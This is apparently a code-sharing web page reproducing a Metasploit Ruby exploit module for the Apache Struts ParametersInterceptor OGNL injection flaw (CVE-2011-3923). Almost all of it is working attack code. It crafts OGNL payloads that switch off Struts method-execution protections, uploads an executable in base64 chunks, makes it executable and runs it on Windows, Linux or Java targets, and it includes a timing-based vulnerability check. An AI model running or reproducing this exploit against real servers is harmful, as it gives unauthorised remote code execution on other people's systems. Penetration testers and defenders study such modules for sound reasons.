扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution', 'Description'=> %q{ This module exploits a remote command execution vulnerability in Apache Struts versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows for the use of parentheses which in turn allows it to interpret parameter values as OGNL expressions during certain exception handling for mismatched data types of properties which allows remote attackers to execute arbitrary Java code via a crafted parameter. }, 'Author' => [ 'Meder Kydyraliev', # Vulnerability Discovery and PoC 'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module 'mihi' #ARCH_JAVA support ], 'License'=> MSF_LICENSE, 'References' => [ [ 'CVE', '2011-3923'], [ 'OSVDB', '78501'], [ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'], [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009'] ], 'Platform'=> [ 'win', 'linux', 'java'], 'Privileged' => true, 'Targets'=> [ ['Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'windows' } ], ['Linux Universal', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], [ 'Java Universal', { 'Arch' => ARCH_JAVA, 'Platform' => 'java' }, ] ], 'DisclosureDate' => 'Oct 01 2011', 'DefaultTarget' => 2)) register_options( [ Opt::RPORT(8080), OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]), OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"]), OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) ], self.class) end def execute_command(cmd, opts = {}) inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]" inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true" inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER'])) inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd)) uri = String.new(datastore['TARGETURI']) uri = normalize_uri(uri) uri.gsub!(/INJECT/,inject) # append the injection string resp = send_request_cgi({ 'uri' => uri, 'version' => '1.1', 'method'=> 'GET', }) return resp #Used for check function. end def exploit #Set up generic values. @payload_exe = rand_text_alphanumeric(4+rand(4)) pl_exe = generate_payload_exe append = 'false' #Now arch specific... case target['Platform'] when 'linux' @payload_exe = "/tmp/#{@payload_exe}" chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))" exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))" when 'java' @payload_exe << ".jar" pl_exe = payload.encoded_jar.pack exec_cmd = "" exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked')," exec_cmd << "#q.setAccessible(true),#q.set(null,true)," exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15')," exec_cmd << "#q.setAccessible(true),#q.set(null,false)," exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()})," exec_cmd << "#c=#cl.loadClass('metasploit.Payload')," exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(" exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})" when 'windows' @payload_exe = "./#{@payload_exe}.exe" exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')" else fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!') end #Now with all the arch specific stuff set, perform the upload. #109 = length of command string plus the max length of append. sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length chunk_length = 2048 - sub_from_chunk chunk_length = ((chunk_length/4).floor)*3 while pl_exe.length > chunk_length java_upload_part(pl_exe[0,chunk_length],@payload_exe,append) pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length] append = true end java_upload_part(pl_exe,@payload_exe,append) execute_command(chmod_cmd) if target['Platform'] == 'linux' execute_command(exec_cmd) register_files_for_cleanup(@payload_exe) end def java_upload_part(part, filename, append = 'false') cmd = "" cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append})," cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}'))," cmd << "#f.close()" execute_command(cmd) end def check sleep_time = datastore['CHECK_SLEEPTIME'] check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})" t1 = Time.now print_status("Asking remote server to sleep for #{sleep_time} seconds") response = execute_command(check_cmd) t2 = Time.now delta = t2 - t1 if response.nil? return Exploit::CheckCode::Safe elsif delta < sleep_time return Exploit::CheckCode::Safe else return Exploit::CheckCode::Appears end end end |
体验盒子
